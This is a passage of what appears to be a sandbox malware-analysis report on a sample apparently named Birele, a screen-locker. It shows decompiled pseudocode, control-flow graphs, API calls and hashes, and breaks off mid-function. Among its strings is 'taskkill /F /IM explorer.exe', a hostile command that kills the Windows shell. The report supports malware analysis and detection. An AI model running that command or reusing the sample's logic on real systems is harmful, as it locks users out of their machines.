                                                                                                                                                  • API ID: Window$CounterExecFindInfoMessageParametersPerformanceQuerySendShowSystem
                                                                                                                                                  • String ID: Program Manager$taskkill /F /IM explorer.exe
                                                                                                                                                  • API String ID: 964502904-1499361905
                                                                                                                                                  • Opcode ID: 81489114cb99e6e32064cc5370d78c1e428efce3f18f5a635dc6c56d2a61b542
                                                                                                                                                  • Instruction ID: 384b94e21422124d9d16ca04a17792f24598e8d7322fdf9879bd3e4b08f62891
                                                                                                                                                  • Opcode Fuzzy Hash: 81489114cb99e6e32064cc5370d78c1e428efce3f18f5a635dc6c56d2a61b542
                                                                                                                                                  • Instruction Fuzzy Hash: 9E018F347847046BD610BBA6CC43F9A76A8DB44B08F62047AB500BA1C2D9BDA940896E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 385 406520-40655c call 403a44 388 406662-40666e 385->388 389 406562-40656a 385->389 390 406670-406672 388->390 391 406674-40668e call 4079f0 388->391 392 40656c-406570 389->392 393 40657f-406597 call 4083e0 call 407fd0 call 406dfc 389->393 390->391 394 4066c1-4066c9 390->394 406 406690-40669d call 4079fc 391->406 407 40669f-4066af call 4079f0 391->407 392->393 396 406572-40657a call 403c50 392->396 421 40659c-4065a2 393->421 399 4066d3-4066ed call 407a18 394->399 400 4066cb-4066cd 394->400 396->393 416 4066fe-40670e call 407a18 399->416 417 4066ef-4066fc call 407a24 399->417 400->399 404 4066cf-4066d1 400->404 404->399 409 406720-406722 404->409 406->407 407->394 424 4066b1-4066bf call 4079fc 407->424 413 406724 409->413 414 40672c-406741 call 4039ac 409->414 413->414 416->409 433 406710-40671e call 407a24 416->433 417->416 421->388 426 4065a8-4065af 421->426 424->394 426->388 432 4065b5-4065cb call 4077ec 426->432 438 4065d7 432->438 439 4065cd-4065cf 432->439 433->409 441 4065db-4065dd 438->441 440 4065d1-4065d5 439->440 439->441 440->441 442 4065e2-4065e4 441->442 443 4065e6-4065ed 442->443 444 4065ef-4065f3 442->444 443->444 445 4065df 443->445 446 4065f5-406614 call 407d04 call 406b4c call 407fd0 call 406e28 SelectObject 444->446 447 406616-406646 call 403c48 call 403e38 call 406e28 DrawTextA 444->447 445->442 446->447 461 406648-406654 call 407fd0 SelectObject 447->461 462 406659-40665f 447->462 461->462 462->388
                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                  			E00406520(intOrPtr __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				char _v28;
                                                                                                                                                  				void* _v32;
                                                                                                                                                  				signed int _v36;
                                                                                                                                                  				struct tagRECT _v52;
                                                                                                                                                  				void* _t62;
                                                                                                                                                  				void* _t66;
                                                                                                                                                  				void* _t68;
                                                                                                                                                  				intOrPtr _t69;
                                                                                                                                                  				void* _t73;
                                                                                                                                                  				void* _t85;
                                                                                                                                                  				intOrPtr _t92;
                                                                                                                                                  				void* _t97;
                                                                                                                                                  				void* _t102;
                                                                                                                                                  				int _t106;
                                                                                                                                                  				CHAR* _t108;
                                                                                                                                                  				void* _t120;
                                                                                                                                                  				intOrPtr _t129;
                                                                                                                                                  				void* _t130;
                                                                                                                                                  				intOrPtr _t131;
                                                                                                                                                  				void* _t132;
                                                                                                                                                  				void* _t133;
                                                                                                                                                  				intOrPtr _t144;
                                                                                                                                                  				intOrPtr _t149;
                                                                                                                                                  				intOrPtr _t151;
                                                                                                                                                  				intOrPtr _t152;
                                                                                                                                                  				void* _t155;
                                                                                                                                                  
                                                                                                                                                  				_t133 = __ecx;
                                                                                                                                                  				_v32 = 0;
                                                                                                                                                  				_t149 = __eax;
                                                                                                                                                  				_push(_t155);
                                                                                                                                                  				_push(0x406742);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t155 + 0xffffffd0;
                                                                                                                                                  				_t129 = __eax;
                                                                                                                                                  				_t138 =  *((intOrPtr*)(__eax + 0xe2));
                                                                                                                                                  				E00403A44( &_v32,  *((intOrPtr*)(__eax + 0xe2)));
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				if(_v32 == 0) {
                                                                                                                                                  					L19:
                                                                                                                                                  					_t130 = 0;
                                                                                                                                                  					_t151 = _t149;
                                                                                                                                                  					_t62 =  *((intOrPtr*)(_t151 + 0x13a)) - 2;
                                                                                                                                                  					if(_t62 < 0 || _t62 == 1) {
                                                                                                                                                  						_v8 = 0;
                                                                                                                                                  						_t66 = E004079F0(_t138);
                                                                                                                                                  						_t140 = _v20 + _v8;
                                                                                                                                                  						if(_t66 != _v20 + _v8) {
                                                                                                                                                  							_t140 = _v20 + _v8;
                                                                                                                                                  							E004079FC(_v20 + _v8);
                                                                                                                                                  							_t130 = 1;
                                                                                                                                                  						}
                                                                                                                                                  						_t68 = E004079F0(_t140);
                                                                                                                                                  						_t138 =  *((short*)(_t151 + 0xd8));
                                                                                                                                                  						if(_t68 <  *((short*)(_t151 + 0xd8))) {
                                                                                                                                                  							_t138 =  *((short*)(_t151 + 0xd8));
                                                                                                                                                  							E004079FC( *((short*)(_t151 + 0xd8)));
                                                                                                                                                  							_t130 = 1;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t69 =  *((intOrPtr*)(_t151 + 0x13a));
                                                                                                                                                  					if(_t69 == 0) {
                                                                                                                                                  						L28:
                                                                                                                                                  						_v12 = 0;
                                                                                                                                                  						_t73 = E00407A18(_t138);
                                                                                                                                                  						_t142 = _v16 + _v12;
                                                                                                                                                  						if(_t73 != _v16 + _v12) {
                                                                                                                                                  							_t142 = _v16 + _v12;
                                                                                                                                                  							E00407A24(_v16 + _v12);
                                                                                                                                                  							_t130 = 1;
                                                                                                                                                  						}
                                                                                                                                                  						if(E00407A18(_t142) <  *((short*)(_t151 + 0xdc))) {
                                                                                                                                                  							E00407A24( *((short*)(_t151 + 0xdc)));
                                                                                                                                                  							_t130 = 1;
                                                                                                                                                  						}
                                                                                                                                                  						goto L32;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t85 = _t69 - 2;
                                                                                                                                                  						if(_t85 == 0 || _t85 == 2) {
                                                                                                                                                  							goto L28;
                                                                                                                                                  						} else {
                                                                                                                                                  							L32:
                                                                                                                                                  							if(_t130 != 0) {
                                                                                                                                                  								 *0x418104();
                                                                                                                                                  							}
                                                                                                                                                  							_pop(_t144);
                                                                                                                                                  							 *[fs:eax] = _t144;
                                                                                                                                                  							_push(E00406749);
                                                                                                                                                  							return E004039AC( &_v32);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t92 =  *((intOrPtr*)(_t129 + 0xa8));
                                                                                                                                                  				if(_t92 != 0 &&  *((char*)(_t92 + 0x45)) != 0) {
                                                                                                                                                  					_t138 = 0x406758;
                                                                                                                                                  					E00403C50( &_v32, 0x406758);
                                                                                                                                                  				}
                                                                                                                                                  				E004083E0(_t129);
                                                                                                                                                  				_t97 = E00407FD0(_t129, _t133, _t138);
                                                                                                                                                  				_t136 =  &_v20;
                                                                                                                                                  				_t138 = _v32;
                                                                                                                                                  				E00406DFC(_t97,  &_v20, _v32,  &_v28); // executed
                                                                                                                                                  				_t131 = _t149;
                                                                                                                                                  				if(( *(_t131 + 0x34) & 0x00000001) != 0 &&  *((char*)(_t131 + 0x13a)) != 5) {
                                                                                                                                                  					_t138 =  &_v52;
                                                                                                                                                  					E004077EC(_t131,  &_v52);
                                                                                                                                                  					_v36 = 0x450;
                                                                                                                                                  					_t102 =  *((intOrPtr*)(_t131 + 0x3a)) - 1;
                                                                                                                                                  					if(_t102 == 0) {
                                                                                                                                                  						_t22 =  &_v36;
                                                                                                                                                  						 *_t22 = _v36 | 0x00000002;
                                                                                                                                                  						__eflags =  *_t22;
                                                                                                                                                  					} else {
                                                                                                                                                  						if(_t102 == 1) {
                                                                                                                                                  							_v36 = _v36 | 0x00000001;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t152 = _t131;
                                                                                                                                                  					while(_t152 != 0 &&  *((intOrPtr*)(_t152 + 0xa8)) == 0) {
                                                                                                                                                  						_t152 =  *((intOrPtr*)(_t152 + 0x30));
                                                                                                                                                  					}
                                                                                                                                                  					_t132 = 0;
                                                                                                                                                  					_t166 = _t152;
                                                                                                                                                  					if(_t152 != 0) {
                                                                                                                                                  						_t120 = E00406B4C(E00407D04(_t152), _t138, _t166);
                                                                                                                                                  						_t132 = SelectObject(E00406E28(E00407FD0(_t149, _t136, _t138)), _t120);
                                                                                                                                                  					}
                                                                                                                                                  					_t106 = E00403C48(_v32);
                                                                                                                                                  					_t108 = E00403E38(_v32);
                                                                                                                                                  					_v16 = DrawTextA(E00406E28( *((intOrPtr*)(_t149 + 0xca))), _t108, _t106,  &_v52, _v36);
                                                                                                                                                  					if(_t152 != 0) {
                                                                                                                                                  						SelectObject( *(E00407FD0(_t149, _t136, _t138) + 0x1c), _t132);
                                                                                                                                                  					}
                                                                                                                                                  					_v20 = _v52.right - _v52.left;
                                                                                                                                                  				}
                                                                                                                                                  			}

































                                                                                                                                                  0x00406520
                                                                                                                                                  0x0040652b
                                                                                                                                                  0x0040652e
                                                                                                                                                  0x00406532
                                                                                                                                                  0x00406533
                                                                                                                                                  0x00406538
                                                                                                                                                  0x0040653b
                                                                                                                                                  0x00406541
                                                                                                                                                  0x00406543
                                                                                                                                                  0x00406549
                                                                                                                                                  0x00406550
                                                                                                                                                  0x00406555
                                                                                                                                                  0x0040655c
                                                                                                                                                  0x00406662
                                                                                                                                                  0x00406662
                                                                                                                                                  0x00406664
                                                                                                                                                  0x0040666c
                                                                                                                                                  0x0040666e
                                                                                                                                                  0x0040667c
                                                                                                                                                  0x00406681
                                                                                                                                                  0x00406689
                                                                                                                                                  0x0040668e
                                                                                                                                                  0x00406693
                                                                                                                                                  0x00406698
                                                                                                                                                  0x0040669d
                                                                                                                                                  0x0040669d
                                                                                                                                                  0x004066a1
                                                                                                                                                  0x004066a6
                                                                                                                                                  0x004066af
                                                                                                                                                  0x004066b1
                                                                                                                                                  0x004066ba
                                                                                                                                                  0x004066bf
                                                                                                                                                  0x004066bf
                                                                                                                                                  0x004066af
                                                                                                                                                  0x004066c1
                                                                                                                                                  0x004066c9
                                                                                                                                                  0x004066d3
                                                                                                                                                  0x004066db
                                                                                                                                                  0x004066e0
                                                                                                                                                  0x004066e8
                                                                                                                                                  0x004066ed
                                                                                                                                                  0x004066f2
                                                                                                                                                  0x004066f7
                                                                                                                                                  0x004066fc
                                                                                                                                                  0x004066fc
                                                                                                                                                  0x0040670e
                                                                                                                                                  0x00406719
                                                                                                                                                  0x0040671e
                                                                                                                                                  0x0040671e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004066cb
                                                                                                                                                  0x004066cb
                                                                                                                                                  0x004066cd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406720
                                                                                                                                                  0x00406720
                                                                                                                                                  0x00406722
                                                                                                                                                  0x00406726
                                                                                                                                                  0x00406726
                                                                                                                                                  0x0040672e
                                                                                                                                                  0x00406731
                                                                                                                                                  0x00406734
                                                                                                                                                  0x00406741
                                                                                                                                                  0x00406741
                                                                                                                                                  0x004066cd
                                                                                                                                                  0x004066c9
                                                                                                                                                  0x00406562
                                                                                                                                                  0x0040656a
                                                                                                                                                  0x00406575
                                                                                                                                                  0x0040657a
                                                                                                                                                  0x0040657a
                                                                                                                                                  0x00406581
                                                                                                                                                  0x0040658c
                                                                                                                                                  0x00406591
                                                                                                                                                  0x00406594
                                                                                                                                                  0x00406597
                                                                                                                                                  0x0040659c
                                                                                                                                                  0x004065a2
                                                                                                                                                  0x004065b5
                                                                                                                                                  0x004065ba
                                                                                                                                                  0x004065bf
                                                                                                                                                  0x004065c9
                                                                                                                                                  0x004065cb
                                                                                                                                                  0x004065d7
                                                                                                                                                  0x004065d7
                                                                                                                                                  0x004065d7
                                                                                                                                                  0x004065cd
                                                                                                                                                  0x004065cf
                                                                                                                                                  0x004065d1
                                                                                                                                                  0x004065d1
                                                                                                                                                  0x004065cf
                                                                                                                                                  0x004065db
                                                                                                                                                  0x004065e2
                                                                                                                                                  0x004065df
                                                                                                                                                  0x004065df
                                                                                                                                                  0x004065ef
                                                                                                                                                  0x004065f1
                                                                                                                                                  0x004065f3
                                                                                                                                                  0x004065fc
                                                                                                                                                  0x00406614
                                                                                                                                                  0x00406614
                                                                                                                                                  0x00406621
                                                                                                                                                  0x0040662a
                                                                                                                                                  0x00406641
                                                                                                                                                  0x00406646
                                                                                                                                                  0x00406654
                                                                                                                                                  0x00406654
                                                                                                                                                  0x0040665f
                                                                                                                                                  0x0040665f

                                                                                                                                                  APIs
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0040660F
                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000,?,00000002), ref: 0040663C
                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00406654
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ObjectSelect$DrawText
                                                                                                                                                  • String ID: D\@
                                                                                                                                                  • API String ID: 2627105080-3892359110
                                                                                                                                                  • Opcode ID: 5eaea885d48285fb43c7fe077c569aa3710862acaa3c0c5f26809f93b59757aa
                                                                                                                                                  • Instruction ID: 34afb7285cee6a7a0d4f1a8fc553a28e21d78793f8037de695fd2fb115f7d147
                                                                                                                                                  • Opcode Fuzzy Hash: 5eaea885d48285fb43c7fe077c569aa3710862acaa3c0c5f26809f93b59757aa
                                                                                                                                                  • Instruction Fuzzy Hash: 7F51B470A046555BCB10EB79CC81AAFB7B5AF44308F05853AE845F7386DB3CA911CB5D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 466 40651e-40655c call 403a44 470 406662-40666e 466->470 471 406562-40656a 466->471 472 406670-406672 470->472 473 406674-40668e call 4079f0 470->473 474 40656c-406570 471->474 475 40657f-40658c call 4083e0 call 407fd0 471->475 472->473 476 4066c1-4066c9 472->476 488 406690-40669d call 4079fc 473->488 489 40669f-4066af call 4079f0 473->489 474->475 478 406572-40657a call 403c50 474->478 490 406591-406597 call 406dfc 475->490 481 4066d3-4066ed call 407a18 476->481 482 4066cb-4066cd 476->482 478->475 498 4066fe-40670e call 407a18 481->498 499 4066ef-4066fc call 407a24 481->499 482->481 486 4066cf-4066d1 482->486 486->481 491 406720-406722 486->491 488->489 489->476 506 4066b1-4066bf call 4079fc 489->506 503 40659c-4065a2 490->503 495 406724 491->495 496 40672c-406741 call 4039ac 491->496 495->496 498->491 515 406710-40671e call 407a24 498->515 499->498 503->470 508 4065a8-4065af 503->508 506->476 508->470 514 4065b5-4065cb call 4077ec 508->514 520 4065d7 514->520 521 4065cd-4065cf 514->521 515->491 523 4065db-4065dd 520->523 522 4065d1-4065d5 521->522 521->523 522->523 524 4065e2-4065e4 523->524 525 4065e6-4065ed 524->525 526 4065ef-4065f3 524->526 525->526 527 4065df 525->527 528 4065f5-406614 call 407d04 call 406b4c call 407fd0 call 406e28 SelectObject 526->528 529 406616-406646 call 403c48 call 403e38 call 406e28 DrawTextA 526->529 527->524 528->529 543 406648-406654 call 407fd0 SelectObject 529->543 544 406659-40665f 529->544 543->544 544->470
                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                  			E0040651E(intOrPtr __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				char _v28;
                                                                                                                                                  				void* _v32;
                                                                                                                                                  				signed int _v36;
                                                                                                                                                  				struct tagRECT _v52;
                                                                                                                                                  				void* _t62;
                                                                                                                                                  				void* _t66;
                                                                                                                                                  				void* _t68;
                                                                                                                                                  				intOrPtr _t69;
                                                                                                                                                  				void* _t73;
                                                                                                                                                  				void* _t85;
                                                                                                                                                  				intOrPtr _t92;
                                                                                                                                                  				void* _t97;
                                                                                                                                                  				void* _t102;
                                                                                                                                                  				int _t106;
                                                                                                                                                  				CHAR* _t108;
                                                                                                                                                  				void* _t120;
                                                                                                                                                  				intOrPtr _t129;
                                                                                                                                                  				void* _t130;
                                                                                                                                                  				intOrPtr _t131;
                                                                                                                                                  				void* _t132;
                                                                                                                                                  				void* _t133;
                                                                                                                                                  				intOrPtr _t144;
                                                                                                                                                  				intOrPtr _t149;
                                                                                                                                                  				intOrPtr _t151;
                                                                                                                                                  				intOrPtr _t152;
                                                                                                                                                  				void* _t155;
                                                                                                                                                  
                                                                                                                                                  				_t133 = __ecx;
                                                                                                                                                  				_v32 = 0;
                                                                                                                                                  				_t149 = __eax;
                                                                                                                                                  				_push(_t155);
                                                                                                                                                  				_push(0x406742);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t155 + 0xffffffd0;
                                                                                                                                                  				_t129 = __eax;
                                                                                                                                                  				_t138 =  *((intOrPtr*)(__eax + 0xe2));
                                                                                                                                                  				E00403A44( &_v32,  *((intOrPtr*)(__eax + 0xe2)));
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				if(_v32 == 0) {
                                                                                                                                                  					L20:
                                                                                                                                                  					_t130 = 0;
                                                                                                                                                  					_t151 = _t149;
                                                                                                                                                  					_t62 =  *((intOrPtr*)(_t151 + 0x13a)) - 2;
                                                                                                                                                  					if(_t62 < 0 || _t62 == 1) {
                                                                                                                                                  						_v8 = 0;
                                                                                                                                                  						_t66 = E004079F0(_t138);
                                                                                                                                                  						_t140 = _v20 + _v8;
                                                                                                                                                  						if(_t66 != _v20 + _v8) {
                                                                                                                                                  							_t140 = _v20 + _v8;
                                                                                                                                                  							E004079FC(_v20 + _v8);
                                                                                                                                                  							_t130 = 1;
                                                                                                                                                  						}
                                                                                                                                                  						_t68 = E004079F0(_t140);
                                                                                                                                                  						_t138 =  *((short*)(_t151 + 0xd8));
                                                                                                                                                  						if(_t68 <  *((short*)(_t151 + 0xd8))) {
                                                                                                                                                  							_t138 =  *((short*)(_t151 + 0xd8));
                                                                                                                                                  							E004079FC( *((short*)(_t151 + 0xd8)));
                                                                                                                                                  							_t130 = 1;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t69 =  *((intOrPtr*)(_t151 + 0x13a));
                                                                                                                                                  					if(_t69 == 0) {
                                                                                                                                                  						L29:
                                                                                                                                                  						_v12 = 0;
                                                                                                                                                  						_t73 = E00407A18(_t138);
                                                                                                                                                  						_t142 = _v16 + _v12;
                                                                                                                                                  						if(_t73 != _v16 + _v12) {
                                                                                                                                                  							_t142 = _v16 + _v12;
                                                                                                                                                  							E00407A24(_v16 + _v12);
                                                                                                                                                  							_t130 = 1;
                                                                                                                                                  						}
                                                                                                                                                  						if(E00407A18(_t142) <  *((short*)(_t151 + 0xdc))) {
                                                                                                                                                  							E00407A24( *((short*)(_t151 + 0xdc)));
                                                                                                                                                  							_t130 = 1;
                                                                                                                                                  						}
                                                                                                                                                  						goto L33;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t85 = _t69 - 2;
                                                                                                                                                  						if(_t85 == 0 || _t85 == 2) {
                                                                                                                                                  							goto L29;
                                                                                                                                                  						} else {
                                                                                                                                                  							L33:
                                                                                                                                                  							if(_t130 != 0) {
                                                                                                                                                  								 *0x418104();
                                                                                                                                                  							}
                                                                                                                                                  							_pop(_t144);
                                                                                                                                                  							 *[fs:eax] = _t144;
                                                                                                                                                  							_push(E00406749);
                                                                                                                                                  							return E004039AC( &_v32);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_t92 =  *((intOrPtr*)(_t129 + 0xa8));
                                                                                                                                                  					if(_t92 != 0 &&  *((char*)(_t92 + 0x45)) != 0) {
                                                                                                                                                  						_t138 = 0x406758;
                                                                                                                                                  						E00403C50( &_v32, 0x406758);
                                                                                                                                                  					}
                                                                                                                                                  					E004083E0(_t129);
                                                                                                                                                  					_t97 = E00407FD0(_t129, _t133, _t138);
                                                                                                                                                  					_t136 =  &_v20;
                                                                                                                                                  					_t138 = _v32;
                                                                                                                                                  					E00406DFC(_t97,  &_v20, _v32,  &_v28); // executed
                                                                                                                                                  					_t131 = _t149;
                                                                                                                                                  					if(( *(_t131 + 0x34) & 0x00000001) != 0 &&  *((char*)(_t131 + 0x13a)) != 5) {
                                                                                                                                                  						_t138 =  &_v52;
                                                                                                                                                  						E004077EC(_t131,  &_v52);
                                                                                                                                                  						_v36 = 0x450;
                                                                                                                                                  						_t102 =  *((intOrPtr*)(_t131 + 0x3a)) - 1;
                                                                                                                                                  						if(_t102 == 0) {
                                                                                                                                                  							_t22 =  &_v36;
                                                                                                                                                  							 *_t22 = _v36 | 0x00000002;
                                                                                                                                                  							__eflags =  *_t22;
                                                                                                                                                  						} else {
                                                                                                                                                  							if(_t102 == 1) {
                                                                                                                                                  								_v36 = _v36 | 0x00000001;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t152 = _t131;
                                                                                                                                                  						while(_t152 != 0 &&  *((intOrPtr*)(_t152 + 0xa8)) == 0) {
                                                                                                                                                  							_t152 =  *((intOrPtr*)(_t152 + 0x30));
                                                                                                                                                  						}
                                                                                                                                                  						_t132 = 0;
                                                                                                                                                  						_t166 = _t152;
                                                                                                                                                  						if(_t152 != 0) {
                                                                                                                                                  							_t120 = E00406B4C(E00407D04(_t152), _t138, _t166);
                                                                                                                                                  							_t132 = SelectObject(E00406E28(E00407FD0(_t149, _t136, _t138)), _t120);
                                                                                                                                                  						}
                                                                                                                                                  						_t106 = E00403C48(_v32);
                                                                                                                                                  						_t108 = E00403E38(_v32);
                                                                                                                                                  						_v16 = DrawTextA(E00406E28( *((intOrPtr*)(_t149 + 0xca))), _t108, _t106,  &_v52, _v36);
                                                                                                                                                  						if(_t152 != 0) {
                                                                                                                                                  							SelectObject( *(E00407FD0(_t149, _t136, _t138) + 0x1c), _t132);
                                                                                                                                                  						}
                                                                                                                                                  						_v20 = _v52.right - _v52.left;
                                                                                                                                                  					}
                                                                                                                                                  					goto L20;
                                                                                                                                                  				}
                                                                                                                                                  			}

































                                                                                                                                                  0x0040651e
                                                                                                                                                  0x0040652b
                                                                                                                                                  0x0040652e
                                                                                                                                                  0x00406532
                                                                                                                                                  0x00406533
                                                                                                                                                  0x00406538
                                                                                                                                                  0x0040653b
                                                                                                                                                  0x00406541
                                                                                                                                                  0x00406543
                                                                                                                                                  0x00406549
                                                                                                                                                  0x00406550
                                                                                                                                                  0x00406555
                                                                                                                                                  0x0040655c
                                                                                                                                                  0x00406662
                                                                                                                                                  0x00406662
                                                                                                                                                  0x00406664
                                                                                                                                                  0x0040666c
                                                                                                                                                  0x0040666e
                                                                                                                                                  0x0040667c
                                                                                                                                                  0x00406681
                                                                                                                                                  0x00406689
                                                                                                                                                  0x0040668e
                                                                                                                                                  0x00406693
                                                                                                                                                  0x00406698
                                                                                                                                                  0x0040669d
                                                                                                                                                  0x0040669d
                                                                                                                                                  0x004066a1
                                                                                                                                                  0x004066a6
                                                                                                                                                  0x004066af
                                                                                                                                                  0x004066b1
                                                                                                                                                  0x004066ba
                                                                                                                                                  0x004066bf
                                                                                                                                                  0x004066bf
                                                                                                                                                  0x004066af
                                                                                                                                                  0x004066c1
                                                                                                                                                  0x004066c9
                                                                                                                                                  0x004066d3
                                                                                                                                                  0x004066db
                                                                                                                                                  0x004066e0
                                                                                                                                                  0x004066e8
                                                                                                                                                  0x004066ed
                                                                                                                                                  0x004066f2
                                                                                                                                                  0x004066f7
                                                                                                                                                  0x004066fc
                                                                                                                                                  0x004066fc
                                                                                                                                                  0x0040670e
                                                                                                                                                  0x00406719
                                                                                                                                                  0x0040671e
                                                                                                                                                  0x0040671e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004066cb
                                                                                                                                                  0x004066cb
                                                                                                                                                  0x004066cd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406720
                                                                                                                                                  0x00406720
                                                                                                                                                  0x00406722
                                                                                                                                                  0x00406726
                                                                                                                                                  0x00406726
                                                                                                                                                  0x0040672e
                                                                                                                                                  0x00406731
                                                                                                                                                  0x00406734
                                                                                                                                                  0x00406741
                                                                                                                                                  0x00406741
                                                                                                                                                  0x004066cd
                                                                                                                                                  0x00406562
                                                                                                                                                  0x00406562
                                                                                                                                                  0x0040656a
                                                                                                                                                  0x00406575
                                                                                                                                                  0x0040657a
                                                                                                                                                  0x0040657a
                                                                                                                                                  0x00406581
                                                                                                                                                  0x0040658c
                                                                                                                                                  0x00406591
                                                                                                                                                  0x00406594
                                                                                                                                                  0x00406597
                                                                                                                                                  0x0040659c
                                                                                                                                                  0x004065a2
                                                                                                                                                  0x004065b5
                                                                                                                                                  0x004065ba
                                                                                                                                                  0x004065bf
                                                                                                                                                  0x004065c9
                                                                                                                                                  0x004065cb
                                                                                                                                                  0x004065d7
                                                                                                                                                  0x004065d7
                                                                                                                                                  0x004065d7
                                                                                                                                                  0x004065cd
                                                                                                                                                  0x004065cf
                                                                                                                                                  0x004065d1
                                                                                                                                                  0x004065d1
                                                                                                                                                  0x004065cf
                                                                                                                                                  0x004065db
                                                                                                                                                  0x004065e2
                                                                                                                                                  0x004065df
                                                                                                                                                  0x004065df
                                                                                                                                                  0x004065ef
                                                                                                                                                  0x004065f1
                                                                                                                                                  0x004065f3
                                                                                                                                                  0x004065fc
                                                                                                                                                  0x00406614
                                                                                                                                                  0x00406614
                                                                                                                                                  0x00406621
                                                                                                                                                  0x0040662a
                                                                                                                                                  0x00406641
                                                                                                                                                  0x00406646
                                                                                                                                                  0x00406654
                                                                                                                                                  0x00406654
                                                                                                                                                  0x0040665f
                                                                                                                                                  0x0040665f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004065a2

                                                                                                                                                  APIs
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0040660F
                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,00000000,?,00000002), ref: 0040663C
                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00406654
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ObjectSelect$DrawText
                                                                                                                                                  • String ID: D\@
                                                                                                                                                  • API String ID: 2627105080-3892359110
                                                                                                                                                  • Opcode ID: 527b19212d4c023dc181196d4a89c01b39c26c164d12a500746eadce34d473f3
                                                                                                                                                  • Instruction ID: 6ab38a91ede8deb55b8f4584c7ef373f68ebec9fdb6bc6ba78808c4b198c6fa1
                                                                                                                                                  • Opcode Fuzzy Hash: 527b19212d4c023dc181196d4a89c01b39c26c164d12a500746eadce34d473f3
                                                                                                                                                  • Instruction Fuzzy Hash: A151B370A046555BCB10EB79CC81AAFB7A9AF44308F05853AE845F7386DB3CAD11CB5D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 548 4076a4-4076aa 549 4076b0-4076b3 548->549 550 4076ac 548->550 551 4076b5-4076b6 549->551 552 4076c9 549->552 550->549 553 4076b8-4076c4 ShowWindow 551->553 554 4076ca-4076dd ShowWindow 551->554 553->552
                                                                                                                                                  C-Code - Quality: 15%
                                                                                                                                                  			E004076A4(void* __eax, void* __edx) {
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				int _t15;
                                                                                                                                                  				struct HWND__* _t16;
                                                                                                                                                  				signed char _t19;
                                                                                                                                                  
                                                                                                                                                  				_t9 = __eax;
                                                                                                                                                  				 *(__eax + 0x27) =  *(__eax + 0x27) & 0x000000ef;
                                                                                                                                                  				if(__edx != 0) {
                                                                                                                                                  					_t3 = __eax + 0x27;
                                                                                                                                                  					 *_t3 =  *(__eax + 0x27) | 0x00000010;
                                                                                                                                                  					_t19 =  *_t3;
                                                                                                                                                  				}
                                                                                                                                                  				_t16 =  *(_t9 + 0x1c);
                                                                                                                                                  				asm("jecxz 0x16");
